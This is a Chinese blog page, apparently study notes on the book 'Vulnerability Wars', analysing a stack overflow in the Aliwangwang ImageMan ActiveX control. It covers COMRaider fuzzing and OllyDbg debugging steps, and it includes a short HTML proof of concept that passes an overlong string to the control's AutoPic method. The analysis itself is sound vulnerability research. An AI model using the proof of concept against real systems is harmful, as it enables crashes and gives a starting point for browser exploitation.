阿里旺旺ActiveX控件ImageMan溢出 漏洞分析

最新推荐文章于 2022-08-29 11:25:57 发布
最新推荐文章于 2022-08-29 11:25:57 发布
阅读量279 收藏
点赞数
分类专栏: 《漏洞战争》漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50287973/article/details/108418707
版权

用ComRaider模糊测试

在这里插入图片描述
在这里插入图片描述

针对ActiveX控件的漏洞分析方法

poc

<html>
 <body>
 <object classid="clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF" id="target"></object>
 <script>
 var buffer = '';
 while (buffer.length < 1111) buffer+="A";
 target.AutoPic(buffer,"defaultV");
 </script>
 </body>
</html>

OD附加IE
ALT+E,找到模块OLEAUT32,双击进入
Crtl+N,找到函数DispCallFunc,双击进入
找到DispCallFunc函数中首个CALL ECX,下断,

最低0.47元/天 解锁文章
SakuraTrick
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveX控件漏洞学习
爱杀之爪的矩阵
11-23 1745
<br />以后可能会一直搞这方面了,挺有意思的,今天在看雪找到了ExploitMe玩了下(08年的ExploitMe大赛的题目)<br />题目A很简单,简单的栈溢出就搞定了,题目B用到了ActiveX控件,基本没接触过,仔细学习了下<br /> <br />注册表查看ActiveX控件<br />HKEY_LOCAL_MACHINE/SOFTWARE/Classes/TypeLib/{7F5E27C1-4A5C-11D3-9232-0000B48A05B2}<br /> <br /> <br />//一
《0day安全》ActiveX 控件漏洞挖掘
weixin_50287973的博客
09-04 594
用工具测试 ActiveX 控件:COMRaider 安装好程序 注册vuln.dll文件 启动程序,单击start 打开vuln.dll,COMRaider 程序将会分析出当前 ActiveX 控件所有的用户接口 这里选择“Method1”用户接口作为被测试用户接口,这是一个函数类型的用户接口,它包含一个 String 类型的参数。 右击选择“Fuzz member” 选择“Fuzz member”选项后,COMRaider 程序将生成测试模板,同时在程序右下方显示这些测试模板文件 单击“Nex
盗墓笔记—阿里旺旺ActiveX控件imageMan.dll栈溢出漏洞研究
dfdhxb995397的博客
02-06 334
本文作者:i春秋作家——cq5f7a075d 也许现在还研究Activex就是挖坟,但是呢,笔者是摸金校尉,挖坟,呸!盗墓是笔者的本职工作。 额,不扯了,本次研究的是阿里旺旺ActiveX控件imageMan.dll栈溢出漏洞,来源于《漏洞战争》一书,书中简单介绍了漏洞情况,没有详述。笔者在研究过程中产生了很多疑问,比如为什么要在DispCallFunc函数处下段?为什么覆盖...
ActiveX 控件漏洞挖掘方法
zacklin的专栏
04-01 4868
ActiveX是微软公司提出,并在1996年被正式命名的组件技术。该技术提供了一种通用的开放程序接口,使用这种技术开发的ActiveX控件可以直接集成到IE浏览器或第三方应用程序中,但由于第三方编程等问题,控件漏洞越来越多,很容易被攻击者利用进行破坏及窃取信息等活动,给个人和企业带来很大损失。本文结合H3C攻防研究团队在攻防研究过程中的经验和体会,阐述ActiveX控件漏洞产生的原理及漏洞挖掘方
ActiveX 控件漏洞挖掘
dengyao6547的博客
08-11 142
SP3中没有SP2含有漏洞的这个dll 目录操作权限 也没有comct232.dll 文件读取权限 文件删除权限 这两章知道他们的函数给用户提供了哪些接口就OK了 转载于:https://www.cnblogs.com/Ccmr/p/7345850.html...
ImageMan ActiveX Suite试用版:一款ActiveX形式的图片浏览和处理控件
07-17
ImageMan ActiveX Suite:registered:是一套32位的ActiveX控件,可用于为Windows的应用程序添加复杂图像的处理以及扫描支持。其控制项已经为Windows平台进行了优化,包括高性能支持以常见的光栅以及向量格式进行图片...
ImageMan.Net Twain试用版:一款用于Twain兼容的相机与扫描仪中扫描及捕获图像的.NET控件
07-16
ImageMan.Net Twain 试用版 试用版 开发语言: .NET 可用平台: Visual Studio 2005/2008/2010/2012/2013 当前版本: v3.2.4 Twain:registered: 工具包是一套100%受控于 .Net WinForms控件与类库,用于创建从Twain...
ImageMan.Net试用版:一款功能强大的图片浏览,处理,修改,打印等的控件
07-16
ImageMan.Net 试用版 试用版 开发语言: .NET 可用平台: Visual Studio 2005/2008/2010/2012 当前版本: v3.2 是一款功能强大的图片处理控件,可以进行超过30多种光栅和矢量图片的加载、浏览、显示、修改、打印、...
ImageMan是一个很棒的图象格式显示/转换控件。支持JPEG、 Photo
02-23
ImageMan是一个很棒的图象格式显示/转换控件。支持JPEG、 Photo CD、PNG、 TIFF*`、 PCX、DCX、WMF、 IMG、 WPG、 BMP、 DIB、 RLE、 EPS、 GIF* 和Targa格式和这些格式之间的任意转换和存盘,是每个Visual程序员都...
imageman:图像处理库
02-03
在实际开发中,`imageman`可以应用于图像编辑软件、数据分析、机器学习预处理、游戏开发等多个领域,极大地丰富了Nim语言在图像处理领域的应用。通过深入学习和熟练使用`imageman`,开发者可以构建出功能强大的图像...
ActiveX控件漏洞挖掘入门
08-18
ActiveX控件漏洞挖掘入门,非常容易使用的COMRaider工具挖掘ActiveX控件漏洞
ImageMan Active X Suite 7.0(.NET)
02-23
圖型處理for.NET
COMRaider、DLL函数查看器和OleView-COM组件查看器,Com信息和Dll导出函数查看工具
03-03
1.COMRaider 2.DLL函数查看器 3.OleView-COM组件查看器 研究Com的读者,欢迎下载
COMRaider COM组件黑盒分析
05-09
COMRaider COM组件黑盒分析 COMRaider COM组件分析 黑盒分析
COMRaider v0.0.134
11-17
COMRaider是一个可以帮助你fuzz ActiveX的工具,查看ActiveX对象的方法;查看ocx控件的所有api
【web-攻击用户】(9.7.2)本地隐私攻击:攻击ActiveX控件
08-29 438
【本地隐私攻击】攻击ActiveX控件
ActiveX溢出漏洞实践分析
w4y2'blog
04-12 2287
我对于ActiveX控件漏洞久仰已久,今天终于腾出时间学习一下,看了《0day》和《软件漏洞发掘》关于ActiveX这部分内容的讲解,以及网上一些博客的讲解,有了一定的了解。 总结了ActiveX漏洞挖掘的步骤: 1).判断是否属于远程类型的ActiveX控件      2).获得该控件的唯一标识。      3).找出该控件的向外提供的所有接口。                 Act
TwinCAT3实现OPCUA通讯问题总结
no___good的博客
06-04 3432
项目需要,初次接触TwinCAT3,需要基于倍福TwinCAT3实现OPCUA通讯。过程中遇到很多问题,电脑也不知道怎么回事疯狂卡死蓝屏,倍福的相关软件程序都卸载之后就好了。调整心态,重新梳理并安装一次,希望这次可以顺利。........................
利用IDL进行以下操作1、读取 ASCII 数据; 2、读取 FY -2 的 9210AWX 文件, FY -2C 的卫星黑体亮度温度产品。 3、读取三种格式图片文件。
最新发布
05-24
要读取三种格式图片文件,可以使用IDL中的IMAGEMAN库。具体命令如下: ``` file_type = FILE_WHICH(filename) IF file_type EQ 'GIF' THEN BEGIN data = READ_GIF(filename) ENDIF ELSE IF file_type EQ 'JPEG' ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值